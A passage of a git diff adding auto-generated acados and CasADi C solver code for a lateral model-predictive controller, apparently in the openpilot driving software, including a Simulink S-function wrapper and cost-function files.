capsule->nlp_dims = lat_acados_create_2_create_and_set_dimensions(capsule); + lat_acados_create_3_create_and_set_functions(capsule); + + // 4) set default parameters in functions + lat_acados_create_4_set_default_parameters(capsule); + + // 5) create and set nlp_in + capsule->nlp_in = ocp_nlp_in_create(capsule->nlp_config, capsule->nlp_dims); + lat_acados_create_5_set_nlp_in(capsule, N, new_time_steps); + + // 6) create and set nlp_opts + capsule->nlp_opts = ocp_nlp_solver_opts_create(capsule->nlp_config, capsule->nlp_dims); + lat_acados_create_6_set_opts(capsule); + + // 7) create and set nlp_out + // 7.1) nlp_out + capsule->nlp_out = ocp_nlp_out_create(capsule->nlp_config, capsule->nlp_dims); + // 7.2) sens_out + capsule->sens_out = ocp_nlp_out_create(capsule->nlp_config, capsule->nlp_dims); + lat_acados_create_7_set_nlp_out(capsule); + + // 8) create solver + capsule->nlp_solver = ocp_nlp_solver_create(capsule->nlp_config, capsule->nlp_dims, capsule->nlp_opts); + //lat_acados_create_8_create_solver(capsule); + + // 9) do precomputations + int status = lat_acados_create_9_precompute(capsule); + return status; +} + +/** + * This function is for updating an already initialized solver with a different number of qp_cond_N. It is useful for code reuse after code export. + */ +int lat_acados_update_qp_solver_cond_N(lat_solver_capsule* capsule, int qp_solver_cond_N) +{ + // 1) destroy solver + ocp_nlp_solver_destroy(capsule->nlp_solver); + + // 2) set new value for "qp_cond_N" + const int N = capsule->nlp_solver_plan->N; + if(qp_solver_cond_N > N) + printf("Warning: qp_solver_cond_N = %d > N = %d\n", qp_solver_cond_N, N); + ocp_nlp_solver_opts_set(capsule->nlp_config, capsule->nlp_opts, "qp_cond_N", &qp_solver_cond_N); + + // 3) continue with the remaining steps from lat_acados_create_with_discretization(...): + // -> 8) create solver + capsule->nlp_solver = ocp_nlp_solver_create(capsule->nlp_config, capsule->nlp_dims, capsule->nlp_opts); + + // -> 9) do precomputations + int status = lat_acados_create_9_precompute(capsule); + return status; +} + + +int lat_acados_reset(lat_solver_capsule* capsule) +{ + + // set initialization to all zeros + + const int N = capsule->nlp_solver_plan->N; + ocp_nlp_config* nlp_config = capsule->nlp_config; + ocp_nlp_dims* nlp_dims = capsule->nlp_dims; + ocp_nlp_out* nlp_out = capsule->nlp_out; + ocp_nlp_in* nlp_in = capsule->nlp_in; + ocp_nlp_solver* nlp_solver = capsule->nlp_solver; + + int nx, nu, nv, ns, nz, ni, dim; + + double* buffer = calloc(NX+NU+NZ+2*NS+2*NSN+NBX+NBU+NG+NH+NPHI+NBX0+NBXN+NHN+NPHIN+NGN, sizeof(double)); + + for(int i=0; i reset memory + int qp_status; + ocp_nlp_get(capsule->nlp_config, capsule->nlp_solver, "qp_status", &qp_status); + if (qp_status == 3) + { + // printf("\nin reset qp_status %d -> resetting QP memory\n", qp_status); + ocp_nlp_solver_reset_qp_memory(nlp_solver, nlp_in, nlp_out); + } + + free(buffer); + return 0; +} + + + + +int lat_acados_update_params(lat_solver_capsule* capsule, int stage, double *p, int np) +{ + int solver_status = 0; + + int casadi_np = 2; + if (casadi_np != np) { + printf("acados_update_params: trying to set %i parameters for external functions." + " External function has %i parameters. Exiting.\n", np, casadi_np); + exit(1); + } + const int N = capsule->nlp_solver_plan->N; + if (stage < N && stage >= 0) + { + capsule->forw_vde_casadi[stage].set_param(capsule->forw_vde_casadi+stage, p); + capsule->expl_ode_fun[stage].set_param(capsule->expl_ode_fun+stage, p); + + + // constraints + + + // cost + if (stage == 0) + { + capsule->cost_y_0_fun.set_param(&capsule->cost_y_0_fun, p); + capsule->cost_y_0_fun_jac_ut_xt.set_param(&capsule->cost_y_0_fun_jac_ut_xt, p); + capsule->cost_y_0_hess.set_param(&capsule->cost_y_0_hess, p); + } + else // 0 < stage < N + { + capsule->cost_y_fun[stage-1].set_param(capsule->cost_y_fun+stage-1, p); + capsule->cost_y_fun_jac_ut_xt[stage-1].set_param(capsule->cost_y_fun_jac_ut_xt+stage-1, p); + capsule->cost_y_hess[stage-1].set_param(capsule->cost_y_hess+stage-1, p); + } + } + + else // stage == N + { + // terminal shooting node has no dynamics + // cost + capsule->cost_y_e_fun.set_param(&capsule->cost_y_e_fun, p); + capsule->cost_y_e_fun_jac_ut_xt.set_param(&capsule->cost_y_e_fun_jac_ut_xt, p); + capsule->cost_y_e_hess.set_param(&capsule->cost_y_e_hess, p); + // constraints + + } + + + return solver_status; +} + + + +int lat_acados_solve(lat_solver_capsule* capsule) +{ + // solve NLP + int solver_status = ocp_nlp_solve(capsule->nlp_solver, capsule->nlp_in, capsule->nlp_out); + + return solver_status; +} + + +int lat_acados_free(lat_solver_capsule* capsule) +{ + // before destroying, keep some info + const int N = capsule->nlp_solver_plan->N; + // free memory + ocp_nlp_solver_opts_destroy(capsule->nlp_opts); + ocp_nlp_in_destroy(capsule->nlp_in); + ocp_nlp_out_destroy(capsule->nlp_out); + ocp_nlp_out_destroy(capsule->sens_out); + ocp_nlp_solver_destroy(capsule->nlp_solver); + ocp_nlp_dims_destroy(capsule->nlp_dims); + ocp_nlp_config_destroy(capsule->nlp_config); + ocp_nlp_plan_destroy(capsule->nlp_solver_plan); + + /* free external function */ + // dynamics + for (int i = 0; i < N; i++) + { + external_function_param_casadi_free(&capsule->forw_vde_casadi[i]); + external_function_param_casadi_free(&capsule->expl_ode_fun[i]); + } + free(capsule->forw_vde_casadi); + free(capsule->expl_ode_fun); + + // cost + external_function_param_casadi_free(&capsule->cost_y_0_fun); + external_function_param_casadi_free(&capsule->cost_y_0_fun_jac_ut_xt); + external_function_param_casadi_free(&capsule->cost_y_0_hess); + for (int i = 0; i < N - 1; i++) + { + external_function_param_casadi_free(&capsule->cost_y_fun[i]); + external_function_param_casadi_free(&capsule->cost_y_fun_jac_ut_xt[i]); + external_function_param_casadi_free(&capsule->cost_y_hess[i]); + } + free(capsule->cost_y_fun); + free(capsule->cost_y_fun_jac_ut_xt); + free(capsule->cost_y_hess); + external_function_param_casadi_free(&capsule->cost_y_e_fun); + external_function_param_casadi_free(&capsule->cost_y_e_fun_jac_ut_xt); + external_function_param_casadi_free(&capsule->cost_y_e_hess); + + // constraints + + return 0; +} + +ocp_nlp_in *lat_acados_get_nlp_in(lat_solver_capsule* capsule) { return capsule->nlp_in; } +ocp_nlp_out *lat_acados_get_nlp_out(lat_solver_capsule* capsule) { return capsule->nlp_out; } +ocp_nlp_out *lat_acados_get_sens_out(lat_solver_capsule* capsule) { return capsule->sens_out; } +ocp_nlp_solver *lat_acados_get_nlp_solver(lat_solver_capsule* capsule) { return capsule->nlp_solver; } +ocp_nlp_config *lat_acados_get_nlp_config(lat_solver_capsule* capsule) { return capsule->nlp_config; } +void *lat_acados_get_nlp_opts(lat_solver_capsule* capsule) { return capsule->nlp_opts; } +ocp_nlp_dims *lat_acados_get_nlp_dims(lat_solver_capsule* capsule) { return capsule->nlp_dims; } +ocp_nlp_plan_t *lat_acados_get_nlp_plan(lat_solver_capsule* capsule) { return capsule->nlp_solver_plan; } + + +void lat_acados_print_stats(lat_solver_capsule* capsule) +{ + int sqp_iter, stat_m, stat_n, tmp_int; + ocp_nlp_get(capsule->nlp_config, capsule->nlp_solver, "sqp_iter", &sqp_iter); + ocp_nlp_get(capsule->nlp_config, capsule->nlp_solver, "stat_n", &stat_n); + ocp_nlp_get(capsule->nlp_config, capsule->nlp_solver, "stat_m", &stat_m); + + + double stat[1200]; + ocp_nlp_get(capsule->nlp_config, capsule->nlp_solver, "statistics", stat); + + int nrow = sqp_iter+1 < stat_m ? sqp_iter+1 : stat_m; + printf("iter\tqp_stat\tqp_iter\n"); + for (int i = 0; i < nrow; i++) + { + for (int j = 0; j < stat_n + 1; j++) + { + tmp_int = (int) stat[i + j * nrow]; + printf("%d\t", tmp_int); + } + printf("\n"); + } +} + diff --git a/selfdrive/controls/lib/lateral_mpc_lib/c_generated_code/acados_solver_sfunction_lat.c b/selfdrive/controls/lib/lateral_mpc_lib/c_generated_code/acados_solver_sfunction_lat.c new file mode 100644 index 000000000..e0586aadf --- /dev/null +++ b/selfdrive/controls/lib/lateral_mpc_lib/c_generated_code/acados_solver_sfunction_lat.c @@ -0,0 +1,264 @@ +/* + * Copyright 2019 Gianluca Frison, Dimitris Kouzoupis, Robin Verschueren, + * Andrea Zanelli, Niels van Duijkeren, Jonathan Frey, Tommaso Sartor, + * Branimir Novoselnik, Rien Quirynen, Rezart Qelibari, Dang Doan, + * Jonas Koenemann, Yutao Chen, Tobias Schöls, Jonas Schlagenhauf, Moritz Diehl + * + * This file is part of acados. + * + * The 2-Clause BSD License + * + * Redistribution and use in source and binary forms, with or without + * modification, are permitted provided that the following conditions are met: + * + * 1. Redistributions of source code must retain the above copyright notice, + * this list of conditions and the following disclaimer. + * + * 2. Redistributions in binary form must reproduce the above copyright notice, + * this list of conditions and the following disclaimer in the documentation + * and/or other materials provided with the distribution. + * + * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" + * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE + * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE + * ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE + * LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR + * CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF + * SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS + * INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN + * CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) + * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE + * POSSIBILITY OF SUCH DAMAGE.; + */ + +#define S_FUNCTION_NAME acados_solver_sfunction_lat +#define S_FUNCTION_LEVEL 2 + +#define MDL_START + +// acados +// #include "acados/utils/print.h" +#include "acados_c/sim_interface.h" +#include "acados_c/external_function_interface.h" + +// example specific +#include "lat_model/lat_model.h" +#include "acados_solver_lat.h" + +#include "simstruc.h" + +#define SAMPLINGTIME 0.009765625 + +static void mdlInitializeSizes (SimStruct *S) +{ + // specify the number of continuous and discrete states + ssSetNumContStates(S, 0); + ssSetNumDiscStates(S, 0);// specify the number of input ports + if ( !ssSetNumInputPorts(S, 8) ) + return; + + // specify the number of output ports + if ( !ssSetNumOutputPorts(S, 6) ) + return; + + // specify dimension information for the input ports + // lbx_0 + ssSetInputPortVectorDimension(S, 0, 4); + // ubx_0 + ssSetInputPortVectorDimension(S, 1, 4); + // parameters + ssSetInputPortVectorDimension(S, 2, (32+1) * 2); + // y_ref_0 + ssSetInputPortVectorDimension(S, 3, 5); + // y_ref + ssSetInputPortVectorDimension(S, 4, 155); + // y_ref_e + ssSetInputPortVectorDimension(S, 5, 3); + // lbx + ssSetInputPortVectorDimension(S, 6, 62); + // ubx + ssSetInputPortVectorDimension(S, 7, 62);/* specify dimension information for the OUTPUT ports */ + ssSetOutputPortVectorDimension(S, 0, 1 ); + ssSetOutputPortVectorDimension(S, 1, 1 ); + ssSetOutputPortVectorDimension(S, 2, 1 ); + ssSetOutputPortVectorDimension(S, 3, 4 ); // state at shooting node 1 + ssSetOutputPortVectorDimension(S, 4, 1); + ssSetOutputPortVectorDimension(S, 5, 1 ); + + // specify the direct feedthrough status + // should be set to 1 for all inputs used in mdlOutputs + ssSetInputPortDirectFeedThrough(S, 0, 1); + ssSetInputPortDirectFeedThrough(S, 1, 1); + ssSetInputPortDirectFeedThrough(S, 2, 1); + ssSetInputPortDirectFeedThrough(S, 3, 1); + ssSetInputPortDirectFeedThrough(S, 4, 1); + ssSetInputPortDirectFeedThrough(S, 5, 1); + ssSetInputPortDirectFeedThrough(S, 6, 1); + ssSetInputPortDirectFeedThrough(S, 7, 1); + + // one sample time + ssSetNumSampleTimes(S, 1); +} + + +#if defined(MATLAB_MEX_FILE) + +#define MDL_SET_INPUT_PORT_DIMENSION_INFO +#define MDL_SET_OUTPUT_PORT_DIMENSION_INFO + +static void mdlSetInputPortDimensionInfo(SimStruct *S, int_T port, const DimsInfo_T *dimsInfo) +{ + if ( !ssSetInputPortDimensionInfo(S, port, dimsInfo) ) + return; +} + +static void mdlSetOutputPortDimensionInfo(SimStruct *S, int_T port, const DimsInfo_T *dimsInfo) +{ + if ( !ssSetOutputPortDimensionInfo(S, port, dimsInfo) ) + return; +} + +#endif /* MATLAB_MEX_FILE */ + + +static void mdlInitializeSampleTimes(SimStruct *S) +{ + ssSetSampleTime(S, 0, SAMPLINGTIME); + ssSetOffsetTime(S, 0, 0.0); +} + + +static void mdlStart(SimStruct *S) +{ + lat_solver_capsule *capsule = lat_acados_create_capsule(); + lat_acados_create(capsule); + + ssSetUserData(S, (void*)capsule); +} + + +static void mdlOutputs(SimStruct *S, int_T tid) +{ + lat_solver_capsule *capsule = ssGetUserData(S); + ocp_nlp_config *nlp_config = lat_acados_get_nlp_config(capsule); + ocp_nlp_dims *nlp_dims = lat_acados_get_nlp_dims(capsule); + ocp_nlp_in *nlp_in = lat_acados_get_nlp_in(capsule); + ocp_nlp_out *nlp_out = lat_acados_get_nlp_out(capsule); + + InputRealPtrsType in_sign; + + // local buffer + real_t buffer[5]; + + /* go through inputs */ + // lbx_0 + in_sign = ssGetInputPortRealSignalPtrs(S, 0); + for (int i = 0; i < 4; i++) + buffer[i] = (double)(*in_sign[i]); + + ocp_nlp_constraints_model_set(nlp_config, nlp_dims, nlp_in, 0, "lbx", buffer); + // ubx_0 + in_sign = ssGetInputPortRealSignalPtrs(S, 1); + for (int i = 0; i < 4; i++) + buffer[i] = (double)(*in_sign[i]); + ocp_nlp_constraints_model_set(nlp_config, nlp_dims, nlp_in, 0, "ubx", buffer); + // parameters - stage-variant !!! + in_sign = ssGetInputPortRealSignalPtrs(S, 2); + + // update value of parameters + for (int ii = 0; ii <= 32; ii++) + { + for (int jj = 0; jj < 2; jj++) + buffer[jj] = (double)(*in_sign[ii*2+jj]); + lat_acados_update_params(capsule, ii, buffer, 2); + } + + + // y_ref_0 + in_sign = ssGetInputPortRealSignalPtrs(S, 3); + + for (int i = 0; i < 5; i++) + buffer[i] = (double)(*in_sign[i]); + + ocp_nlp_cost_model_set(nlp_config, nlp_dims, nlp_in, 0, "yref", (void *) buffer); + + + // y_ref - for stages 1 to N-1 + in_sign = ssGetInputPortRealSignalPtrs(S, 4); + + for (int ii = 1; ii < 32; ii++) + { + for (int jj = 0; jj < 5; jj++) + buffer[jj] = (double)(*in_sign[(ii-1)*5+jj]); + ocp_nlp_cost_model_set(nlp_config, nlp_dims, nlp_in, ii, "yref", (void *) buffer); + } + + + // y_ref_e + in_sign = ssGetInputPortRealSignalPtrs(S, 5); + + for (int i = 0; i < 3; i++) + buffer[i] = (double)(*in_sign[i]); + + ocp_nlp_cost_model_set(nlp_config, nlp_dims, nlp_in, 32, "yref", (void *) buffer); + // lbx + in_sign = ssGetInputPortRealSignalPtrs(S, 6); + for (int ii = 1; ii < 32; ii++) + { + for (int jj = 0; jj < 2; jj++) + buffer[jj] = (double)(*in_sign[(ii-1)*2+jj]); + ocp_nlp_constraints_model_set(nlp_config, nlp_dims, nlp_in, ii, "lbx", (void *) buffer); + } + // ubx + in_sign = ssGetInputPortRealSignalPtrs(S, 7); + for (int ii = 1; ii < 32; ii++) + { + for (int jj = 0; jj < 2; jj++) + buffer[jj] = (double)(*in_sign[(ii-1)*2+jj]); + ocp_nlp_constraints_model_set(nlp_config, nlp_dims, nlp_in, ii, "ubx", (void *) buffer); + } + + /* call solver */ + int rti_phase = 0; + ocp_nlp_solver_opts_set(nlp_config, capsule->nlp_opts, "rti_phase", &rti_phase); + int acados_status = lat_acados_solve(capsule); + + + /* set outputs */ + // assign pointers to output signals + real_t *out_u0, *out_utraj, *out_xtraj, *out_status, *out_sqp_iter, *out_KKT_res, *out_x1, *out_cpu_time, *out_cpu_time_sim, *out_cpu_time_qp, *out_cpu_time_lin; + int tmp_int; + out_u0 = ssGetOutputPortRealSignal(S, 0); + ocp_nlp_out_get(nlp_config, nlp_dims, nlp_out, 0, "u", (void *) out_u0); + + + out_status = ssGetOutputPortRealSignal(S, 1); + *out_status = (real_t) acados_status; + out_KKT_res = ssGetOutputPortRealSignal(S, 2); + *out_KKT_res = (real_t) nlp_out->inf_norm_res; + out_x1 = ssGetOutputPortRealSignal(S, 3); + ocp_nlp_out_get(nlp_config, nlp_dims, nlp_out, 1, "x", (void *) out_x1); + out_cpu_time = ssGetOutputPortRealSignal(S, 4); + // get solution time + ocp_nlp_get(nlp_config, capsule->nlp_solver, "time_tot", (void *) out_cpu_time); + out_sqp_iter = ssGetOutputPortRealSignal(S, 5); + // get sqp iter + ocp_nlp_get(nlp_config, capsule->nlp_solver, "sqp_iter", (void *) &tmp_int); + *out_sqp_iter = (real_t) tmp_int; + +} + +static void mdlTerminate(SimStruct *S) +{ + lat_solver_capsule *capsule = ssGetUserData(S); + + lat_acados_free(capsule); + lat_acados_free_capsule(capsule); +} + + +#ifdef MATLAB_MEX_FILE +#include "simulink.c" +#else +#include "cg_sfun.h" +#endif diff --git a/selfdrive/controls/lib/lateral_mpc_lib/c_generated_code/lat_cost/lat_cost_y_0_fun.c b/selfdrive/controls/lib/lateral_mpc_lib/c_generated_code/lat_cost/lat_cost_y_0_fun.c new file mode 100644 index 000000000..153bf3c0d --- /dev/null +++ b/selfdrive/controls/lib/lateral_mpc_lib/c_generated_code/lat_cost/lat_cost_y_0_fun.c @@ -0,0 +1,163 @@ +/* This file was automatically generated by CasADi 3.6.3. + * It consists of: + * 1) content generated by CasADi runtime: not copyrighted + * 2) template code copied from CasADi source: permissively licensed (MIT-0) + * 3) user code: owned by the user + * + */ +#ifdef __cplusplus +extern "C" { +#endif + +/* How to prefix internal symbols */ +#ifdef CASADI_CODEGEN_PREFIX + #define CASADI_NAMESPACE_CONCAT(NS, ID) _CASADI_NAMESPACE_CONCAT(NS, ID) + #define _CASADI_NAMESPACE_CONCAT(NS, ID) NS ## ID + #define CASADI_PREFIX(ID) CASADI_NAMESPACE_CONCAT(CODEGEN_PREFIX, ID) +#else + #define CASADI_PREFIX(ID) lat_cost_y_0_fun_ ## ID +#endif + +#include + +#ifndef casadi_real +#define casadi_real double +#endif + +#ifndef casadi_int +#define casadi_int int +#endif + +/* Add prefix to internal symbols */ +#define casadi_f0 CASADI_PREFIX(f0) +#define casadi_s0 CASADI_PREFIX(s0) +#define casadi_s1 CASADI_PREFIX(s1) +#define casadi_s2 CASADI_PREFIX(s2) +#define casadi_s3 CASADI_PREFIX(s3) + +/* Symbol visibility in DLLs */ +#ifndef CASADI_SYMBOL_EXPORT + #if defined(_WIN32) || defined(__WIN32__) || defined(__CYGWIN__) + #if defined(STATIC_LINKED) + #define CASADI_SYMBOL_EXPORT + #else + #define CASADI_SYMBOL_EXPORT __declspec(dllexport) + #endif + #elif defined(__GNUC__) && defined(GCC_HASCLASSVISIBILITY) + #define CASADI_SYMBOL_EXPORT __attribute__ ((visibility ("default"))) + #else + #define CASADI_SYMBOL_EXPORT + #endif +#endif + +static const casadi_int casadi_s0[8] = {4, 1, 0, 4, 0, 1, 2, 3}; +static const casadi_int casadi_s1[5] = {1, 1, 0, 1, 0}; +static const casadi_int casadi_s2[6] = {2, 1, 0, 2, 0, 1}; +static const casadi_int casadi_s3[9] = {5, 1, 0, 5, 0, 1, 2, 3, 4}; + +/* lat_cost_y_0_fun:(i0[4],i1,i2[2])->(o0[5]) */ +static int casadi_f0(const casadi_real** arg, casadi_real** res, casadi_int* iw, casadi_real* w, int mem) { + casadi_real a0, a1, a2; + a0=arg[0]? arg[0][1] : 0; + if (res[0]!=0) res[0][0]=a0; + a0=arg[2]? arg[2][0] : 0; + a1=10.; + a1=(a0+a1); + a2=arg[0]? arg[0][2] : 0; + a2=(a1*a2); + if (res[0]!=0) res[0][1]=a2; + a2=arg[0]? arg[0][3] : 0; + a2=(a1*a2); + if (res[0]!=0) res[0][2]=a2; + a2=arg[1]? arg[1][0] : 0; + a1=(a1*a2); + if (res[0]!=0) res[0][3]=a1; + a1=1.0000000000000001e-01; + a0=(a0+a1); + a2=(a2/a0); + if (res[0]!=0) res[0][4]=a2; + return 0; +} + +CASADI_SYMBOL_EXPORT int lat_cost_y_0_fun(const casadi_real** arg, casadi_real** res, casadi_int* iw, casadi_real* w, int mem){ + return casadi_f0(arg, res, iw, w, mem); +} + +CASADI_SYMBOL_EXPORT int lat_cost_y_0_fun_alloc_mem(void) { + return 0; +} + +CASADI_SYMBOL_EXPORT int lat_cost_y_0_fun_init_mem(int mem) { + return 0; +} + +CASADI_SYMBOL_EXPORT void lat_cost_y_0_fun_free_mem(int mem) { +} + +CASADI_SYMBOL_EXPORT int lat_cost_y_0_fun_checkout(void) { + return 0; +} + +CASADI_SYMBOL_EXPORT void lat_cost_y_0_fun_release(int mem) { +} + +CASADI_SYMBOL_EXPORT void lat_cost_y_0_fun_incref(void) { +} + +CASADI_SYMBOL_EXPORT void lat_cost_y_0_fun_decref(void) { +} + +CASADI_SYMBOL_EXPORT casadi_int lat_cost_y_0_fun_n_in(void) { return 3;} + +CASADI_SYMBOL_EXPORT casadi_int lat_cost_y_0_fun_n_out(void) { return 1;} + +CASADI_SYMBOL_EXPORT casadi_real lat_cost_y_0_fun_default_in(casadi_int i) { + switch (i) { + default: return 0; + } +} + +CASADI_SYMBOL_EXPORT const char* lat_cost_y_0_fun_name_in(casadi_int i) { + switch (i) { + case 0: return "i0"; + case 1: return "i1"; + case 2: return "i2"; + default: return 0; + } +} + +CASADI_SYMBOL_EXPORT const char* lat_cost_y_0_fun_name_out(casadi_int i) { + switch (i) { + case 0: return "o0"; + default: return 0; + } +} + +CASADI_SYMBOL_EXPORT const casadi_int* lat_cost_y_0_fun_sparsity_in(casadi_int i) { + switch (i) { + case 0: return casadi_s0; + case 1: return casadi_s1; + case 2: return casadi_s2; + default: return 0; + } +} + +CASADI_SYMBOL_EXPORT const casadi_int* lat_cost_y_0_fun_sparsity_out(casadi_int i) { + switch (i) { + case 0: return casadi_s3; + default: return 0; + } +} + +CASADI_SYMBOL_EXPORT int lat_cost_y_0_fun_work(casadi_int *sz_arg, casadi_int* sz_res, casadi_int *sz_iw, casadi_int *sz_w) { + if (sz_arg) *sz_arg = 3; + if (sz_res) *sz_res = 1; + if (sz_iw) *sz_iw = 0; + if (sz_w) *sz_w = 0; + return 0; +} + + +#ifdef __cplusplus +} /* extern "C" */ +#endif diff --git a/selfdrive/controls/lib/lateral_mpc_lib/c_generated_code/lat_cost/lat_cost_y_0_fun_jac_ut_xt.c b/selfdrive/controls/lib/lateral_mpc_lib/c_generated_code/lat_cost/lat_cost_y_0_fun_jac_ut_xt.c new file mode 100644 index 000000000..fd26beb0a --- /dev/null +++ b/selfdrive/controls/lib/lateral_mpc_lib/c_generated_code/lat_cost/lat_cost_y_0_fun_jac_ut_xt.c @@ -0,0 +1,174 @@ +/* This file was automatically generated by CasADi 3.6.3. + * It consists of: + * 1) content generated by CasADi runtime: not copyrighted + * 2) template code copied from CasADi source: permissively licensed (MIT-0) + * 3) user code: owned by the user + * + */ +#ifdef __cplusplus +extern "C" { +#endif + +/* How to prefix internal symbols */ +#ifdef CASADI_CODEGEN_PREFIX + #define CASADI_NAMESPACE_CONCAT(NS, ID) _CASADI_NAMESPACE_CONCAT(NS, ID) + #define _CASADI_NAMESPACE_CONCAT(NS, ID) NS ## ID + #define CASADI_PREFIX(ID) CASADI_NAMESPACE_CONCAT(CODEGEN_PREFIX, ID) +#else + #define CASADI_PREFIX(ID) lat_cost_y_0_fun_jac_ut_xt_ ## ID +#endif + +#include + +#ifndef casadi_real +#define casadi_real double +#endif + +#ifndef casadi_int +#define casadi_int int +#endif + +/* Add prefix to internal symbols */ +#define casadi_f0 CASADI_PREFIX(f0) +#define casadi_s0 CASADI_PREFIX(s0) +#define casadi_s1 CASADI_PREFIX(s1) +#define casadi_s2 CASADI_PREFIX(s2) +#define casadi_s3 CASADI_PREFIX(s3) +#define casadi_s4 CASADI_PREFIX(s4) + +/* Symbol visibility in DLLs */ +#ifndef CASADI_SYMBOL_EXPORT + #if defined(_WIN32) || defined(__WIN32__) || defined(__CYGWIN__) + #if defined(STATIC_LINKED) + #define CASADI_SYMBOL_EXPORT + #else + #define CASADI_SYMBOL_EXPORT __declspec(dllexport) + #endif + #elif defined(__GNUC__) && defined(GCC_HASCLASSVISIBILITY) + #define CASADI_SYMBOL_EXPORT __attribute__ ((visibility ("default"))) + #else + #define CASADI_SYMBOL_EXPORT + #endif +#endif + +static const casadi_int casadi_s0[8] = {4, 1, 0, 4, 0, 1, 2, 3}; +static const casadi_int casadi_s1[5] = {1, 1, 0, 1, 0}; +static const casadi_int casadi_s2[6] = {2, 1, 0, 2, 0, 1}; +static const casadi_int casadi_s3[9] = {5, 1, 0, 5, 0, 1, 2, 3, 4}; +static const casadi_int casadi_s4[13] = {5, 5, 0, 1, 2, 3, 4, 5, 2, 3, 4, 0, 0}; + +/* lat_cost_y_0_fun_jac_ut_xt:(i0[4],i1,i2[2])->(o0[5],o1[5x5,5nz]) */ +static int casadi_f0(const casadi_real** arg, casadi_real** res, casadi_int* iw, casadi_real* w, int mem) { + casadi_real a0, a1, a2, a3; + a0=arg[0]? arg[0][1] : 0; + if (res[0]!=0) res[0][0]=a0; + a0=arg[2]? arg[2][0] : 0; + a1=10.; + a1=(a0+a1); + a2=arg[0]? arg[0][2] : 0; + a2=(a1*a2); + if (res[0]!=0) res[0][1]=a2; + a2=arg[0]? arg[0][3] : 0; + a2=(a1*a2); + if (res[0]!=0) res[0][2]=a2; + a2=arg[1]? arg[1][0] : 0; + a3=(a1*a2); + if (res[0]!=0) res[0][3]=a3; + a3=1.0000000000000001e-01; + a0=(a0+a3); + a2=(a2/a0); + if (res[0]!=0) res[0][4]=a2; + a2=1.; + if (res[1]!=0) res[1][0]=a2; + if (res[1]!=0) res[1][1]=a1; + if (res[1]!=0) res[1][2]=a1; + if (res[1]!=0) res[1][3]=a1; + a0=(1./a0); + if (res[1]!=0) res[1][4]=a0; + return 0; +} + +CASADI_SYMBOL_EXPORT int lat_cost_y_0_fun_jac_ut_xt(const casadi_real** arg, casadi_real** res, casadi_int* iw, casadi_real* w, int mem){ + return casadi_f0(arg, res, iw, w, mem); +} + +CASADI_SYMBOL_EXPORT int lat_cost_y_0_fun_jac_ut_xt_alloc_mem(void) { + return 0; +} + +CASADI_SYMBOL_EXPORT int lat_cost_y_0_fun_jac_ut_xt_init_mem(int mem) { + return 0; +} + +CASADI_SYMBOL_EXPORT void lat_cost_y_0_fun_jac_ut_xt_free_mem(int mem) { +} + +CASADI_SYMBOL_EXPORT int lat_cost_y_0_fun_jac_ut_xt_checkout(void) { + return 0; +} + +CASADI_SYMBOL_EXPORT void lat_cost_y_0_fun_jac_ut_xt_release(int mem) { +} + +CASADI_SYMBOL_EXPORT void lat_cost_y_0_fun_jac_ut_xt_incref(void) { +} + +CASADI_SYMBOL_EXPORT void lat_cost_y_0_fun_jac_ut_xt_decref(void) { +} + +CASADI_SYMBOL_EXPORT casadi_int lat_cost_y_0_fun_jac_ut_xt_n_in(void) { return 3;} + +CASADI_SYMBOL_EXPORT casadi_int lat_cost_y_0_fun_jac_ut_xt_n_out(void) { return 2;} + +CASADI_SYMBOL_EXPORT casadi_real lat_cost_y_0_fun_jac_ut_xt_default_in(casadi_int i) { + switch (i) { + default: return 0; + } +} + +CASADI_SYMBOL_EXPORT const char* lat_cost_y_0_fun_jac_ut_xt_name_in(casadi_int i) { + switch (i) { + case 0: return "i0"; + case 1: return "i1"; + case 2: return "i2"; + default: return 0; + } +} + +CASADI_SYMBOL_EXPORT const char* lat_cost_y_0_fun_jac_ut_xt_name_out(casadi_int i) { + switch (i) { + case 0: return "o0"; + case 1: return "o1"; + default: return 0; + } +} + +CASADI_SYMBOL_EXPORT const casadi_int* lat_cost_y_0_fun_jac_ut_xt_sparsity_in(casadi_int i) { + switch (i) { + case 0: return casadi_s0; + case 1: return casadi_s1; + case 2: return casadi_s2; + default: return 0; + } +} + +CASADI_SYMBOL_EXPORT const casadi_int* lat_cost_y_0_fun_jac_ut_xt_sparsity_out(casadi_int i) { + switch (i) { + case 0: return casadi_s3; + case 1: return casadi_s4; + default: return 0; + } +} + +CASADI_SYMBOL_EXPORT int lat_cost_y_0_fun_jac_ut_xt_work(casadi_int *sz_arg, casadi_int* sz_res, casadi_int *sz_iw, casadi_int *sz_w) { + if (sz_arg) *sz_arg = 3; + if (sz_res) *sz_res = 2; + if (sz_iw) *sz_iw = 0; + if (sz_w) *sz_w = 0; + return 0; +} + + +#ifdef __cplusplus +} /* extern "C" */ +#endif diff --git a/selfdrive/controls/lib/lateral_mpc_lib/c_generated_code/lat_cost/lat_cost_y_0_hess.c b/selfdrive/controls/lib/lateral_mpc_lib/c_generated_code/lat_cost/lat_cost_y_0_hess.c new file mode 100644 index 000000000..edc3b0561 --- /dev/null +++ b/selfdrive/controls/lib/lateral_mpc_lib/c_generated_code/lat_cost/lat_cost_y_0_hess.c @@ -0,0 +1,148 @@ +/* This file was automatically generated by CasADi 3.6.3. + * It consists of: + * 1) content generated by CasADi runtime: not copyrighted + * 2) template code copied from CasADi source: permissively licensed (MIT-0) + * 3) user code: owned by the user + * + */ +#ifdef __cplusplus +extern "C" { +#endif + +/* How to prefix internal symbols */ +#ifdef CASADI_CODEGEN_PREFIX + #define CASADI_NAMESPACE_CONCAT(NS, ID) _CASADI_NAMESPACE_CONCAT(NS, ID) + #define 